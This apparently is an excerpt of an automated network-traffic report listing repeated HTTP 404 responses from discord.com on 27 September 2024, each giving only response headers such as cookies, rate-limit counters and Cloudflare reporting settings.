Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0d; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453953x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g9rDJixmcl5WsVw1If2Zhyta3ze6tpXE5d32kQflm17bjuwpIjvYMFOrSymWL%2BFoEvZdz%2BV%2B5HfLeDFxNX7NkbizaBnA%2Fr0NKc%2BC2JLkKjc6SQWqZOZxz%2Bxwps0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0da95afac6e7c2e05e6e4f148e3440c6316bb8a89a4ff19078fc0bff73eee4be55; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3a97a79a7cec11efb22fceb003a448a0; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 0x-ratelimit-reset: 1727453953x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo0xIDXdk%2FEb2pBPcbbsLO%2F861QO1SXo8pyDfSImZ%2Btk0dzXI4e1u7z%2FRCV%2FKE1L%2FbKWjdZ45elUa7sU2iNnpM8EIGVqY5IgVvZiah1ee5aEdSrnPH9RuO7rBHTG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3a97a79a7cec11efb22fceb003a448a0a30708dd50747fb654ca905820209b63cb8882db4594a413bb62fdda33d67ddb; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:11 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3afd845c7cec11ef97469e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 1x-ratelimit-reset: 1727453953x-ratelimit-reset-after: 2via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9w6Hm%2BLNVwz0hn0%2FfzMj6E2MKCs37DSbqvW5AlakoQhJ1FfRD5rQ2o9tB0r1%2BPP%2FhLot20ZKtTquqefMB6bBq5KSJSGspfyVKIkwzyTMHyEZ9X9aulbPMFmKZjw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3afd845c7cec11ef97469e0750befc3d03996fc30570ab35836a8ac92ecebe2d236bc94c97af53f7fd9683c73c50609e; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=1776ad4596ce0722254a07daac3e820e46266c04-1727453951; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:15 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63a; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453956x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EO6AHeiMi7fYFfLEGWS9ziqMgNN20IDvQotdN70lFLR6bNNigkKwMrvAbOGUxT4Ont1O4gMOJ7mfoVXFC09%2BWR0TI3aCSmcbZhZwrysIxOic8lSb81J9%2BNN1JAgn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63ac715dba4bca04b42c203381de31eb28e75f4c84c74e77d1df6deb842be5834b2; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4efeb2ea3a62e495dc352b88af2e585aefa65edc-1727453955; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3dc1a8587cec11ef820dd2e2dbf32e93; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453957x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsnFqJvXlU%2BwbM284fPah8DEEMLoHF79%2ByVP3zX5yY6w2vcYVMJJP8CIgb8taqqDF%2Bi%2FN7UMhI7HMlyE3xLwHN%2BTxnaKQH3eDgSnveqrVJ4AfIAC4gZBqiPvUHDV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3dc1a8587cec11ef820dd2e2dbf32e937fca7de2edb84f95324207f86c51753bdba706d58d230b7676189baa895fcef8; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:16 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3e251fdc7cec11ef963cbe4fcb513092; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453958x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6rjdjZ8kvmdTE%2B9gYZyS3cRo6znglB7LfM7m%2F42MoGnlGw4rRTTrGKAPNdeif3iRGaxI5YsftF9BaBUxxA6s6LR1%2BDJULwTdMmYSt4VNtJ7Dz70MJEEJWRf2WKl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3e251fdc7cec11ef963cbe4fcb513092934b8e633dcc6eb2e11fd1c92a5613ed8d8ebdb0dea4b547b3e1167c1e4bcc4b; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:17 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3e8eacae7cec11efb084ba898f4f55ff; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453958x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBe5Lo%2BZ9POrxFT%2BX8e%2Fr39FsO2uZnqiHDXXLCg6xr5nmLq%2F9zrH3I3Q7mE7SVR1F0zAxLZtuCr7ec80lKoNMSRPKQWPeodfuMkPFfLOnThAC755nhiWy9qxORN7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3e8eacae7cec11efb084ba898f4f55ffa348a94986f4ef5989f8f29c7c0361ba202c30265a26f83609f9c4341f6e938a; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=0a8884e8c86705b67a0572bb98a4aef4adcfb203-1727453957; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3ef7a3b27cec11efb7d86adb8ffda96a; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453959x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abr%2BUjwiujgyO3tgGe0ukf1vX6sSJOD0Z0pRX16NhBSAGQvuLnHfBSKYjOmJPBN0cw8V3p1PVK8osR7Zw6WIVCE2ovtL9oqCWMFP0bOovDkWl2pL%2BoDNGxJyQhwG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3ef7a3b27cec11efb7d86adb8ffda96ac79ebdd9ab702b83537aa31e2267ad1cdce4093222083a94b0278809b91f97f3; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:18 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3f60d4367cec11efb6bfce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453960x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bfo6%2BpLH0xBtM%2B3RP9OD0OaZKkyoBbtUyrkI4KEgiIhXoy21wwjPyPhaip6vsf2%2FbnRDSgw5JnzTlgkNCUGCeebPqP%2B8rICPNLGNP4t0M3mjl2S4bP9crLF9nFcv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3f60d4367cec11efb6bfce5421a2957bcfeeea4512cfa12521770092496e33566f10872398fd18bed539d53360ec53db; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:19 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3fcb19e07cec11efbb0972506fccbbd5; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453961x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFlnKR2nBpAXtCrxQtK%2Bpf%2BMHsNlIZlHe8uyy43hvLsC0VLaCiG4p2D0NrlhpcR14RJ3XVwJMNGbijJvkbVG6mlKfKgrA4U1MmP968D%2BQdCRiI7os6sfD1hsrc21"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3fcb19e07cec11efbb0972506fccbbd52046978512bc3a3ff9e052d1d30ab1a6c95dea4efdeac673fad93551797fbe6d; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e4739a2ca980cf72b6c40b39dd5676ede23582a9-1727453959; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=402fc8fe7cec11ef81c93a45c6a02b6a; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453961x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqMEy1frYd0ukYO9EtMVw%2BsPqaLdhpbqcgjRQndVDBMlD5eejQ2PhVrmRBRAH1E%2FWJ1VCEzU2ok4RMCNbZEHYweiG%2BysPNKEOXoHnohl1bqdiF9hATknQzClundF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=402fc8fe7cec11ef81c93a45c6a02b6af1be99b918c971e3318b7f7702684800cab2e17a51b10f7d1029ef53d3341c53; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=2d2e75bff7344a90e4a667f73dabe89efa23a2ba-1727453960; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:22 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=41bc0bf67cec11efb1a5a6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453964x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QK2%2FavJ7q0EEy1lDOKbuKgVuPHMluEIyKyqY7p2wcv7ZaG5caYZUHanDnRZ2g2gT5ut6B%2FSf2hM87wzRYHvSGsQ8%2BV5o%2FFwjz4u11digsZVRVxfpM%2Fbkqew2h8iY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=41bc0bf67cec11efb1a5a6d8f199100ffc8ec33858e1370b306ad38fdc6a81859e5d41b9cf3a6a7cac094cab1042ca91; Expires=Wed, 26-Sep-2029 16:19:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=f8d03ec6a155ae33fbe22a42cbc4732fd9e61759-1727453962; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:23 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=4221b9ce7cec11efb22a3ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453964x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RajYrHLG6vYlTXPvHKXXhjCsRgoOTTBE9b8pSMTRKOiaJ7Xn9I%2Frut8jeq2aeq6wJE5i63BIrKrSWJ4YjS%2F%2Ftrs9ySiZumqHvXTCNsHFHAjjdonejEc7hqgvR7Cm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=4221b9ce7cec11efb22a3ec234dfa5633d4c3bceaa996435223b91e78539479daa6b9d5aea988528bc2590d600b05200; Expires=Wed, 26-Sep-2029 16:19:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=a6802797d16af97b5cc620c82515f6097c37a1f8-1727453963; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:24 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=42895d0e7cec11ef91567637d37b7708; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453965x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=442Djb16TyaSNYpe9QQFkoRlb6mTtnkFg4LNu2b%2F3PU7acl2c3vefCZ2Mp2ALhDR1FRPAuhhWLmBcR3an7k9pe1eeZ05M%2BdmVgyw3n6Piqw3DG4oBw3hqH5xUD7q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=42895d0e7cec11ef91567637d37b770897e59a5d830536b2e6f0e7ba71757f723feff8fed87ec33947345731484d413f; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:24 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=42ef70bc7cec11ef816f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453966x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHjUECUG8xQx8OVrqY4MWG73YGJU5OhI53E4gSYsEnhvmydrNtTNA6pmyr%2FdtYKlhUArl1YV4%2FYy9t7LifUfwFSNi5EKNklsJvKIwetXSve0zrmLd4vQRR91aj8%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=42ef70bc7cec11ef816f96ff52647fd0cbfa5e1ea799c67133cb6f1f55fea7058518a3dd49dc71281a0b48ecc55cfa14; Expires=Wed, 26-Sep-2029 16:19:24 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5b69cb651f261fca4009e01c081c789f863c139a-1727453964; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=4355db5e7cec11ef955696ff52647fd0; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453966x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OtqYMhNtt%2FFa0xkAHhbtWzk1SbvdFFdBj%2Be%2FNvCqmvKWDF%2B%2F1KWE0zZ7nhRNU%2F47wHJpojTcHTYtkUgqbmxI1uz%2FnAanSjP%2BjHK3ecRvp%2FRn%2FW9PmBxyuZQmwO%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=4355db5e7cec11ef955696ff52647fd07750bdb5666355c6889dc3c5a2d74bf48f0809a7944cd902d3bbada349182fdb; Expires=Wed, 26-Sep-2029 16:19:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6afb30d70112b06f4af358280c90e707eb1bb5df-1727453965; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=43bc8f027cec11efb1b69e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453967x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aRYifyhXSJ6%2B4KmJFX6GZ1JJvEEF71HzufJCqJNUkiZKPwX8J6VbPs3%2BKaJijOO7NMHPbO2%2BSfVukhwbCnJ%2BZmENn9TNLSs%2BY1Of4DVJAbFvHAEzdFJcxh4S0VG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=43bc8f027cec11efb1b69e0750befc3ddab8243dea90a8e330eba2ca1b5755b0961219a7b124080cbf09b4289a9c7d74; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:26 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=44217a347cec11efb64d42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453968x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhAmd%2BZgeZSXvXSe2c8EFXJmvH9xMs8ffRMvTWD%2BgpEDiVj1TMorvgpWqgrbsk7u1kL5Cf3ARtIvN%2FZ8Lnq2QFouNZ%2Bcmg7JmG5uG9tVZ%2BgnuBGdTLb6EXHf7MM0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=44217a347cec11efb64d42324cf1d6536764891083d930e3854fe40f90838770b3b087220fb7038ae92c001653b71c5a; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
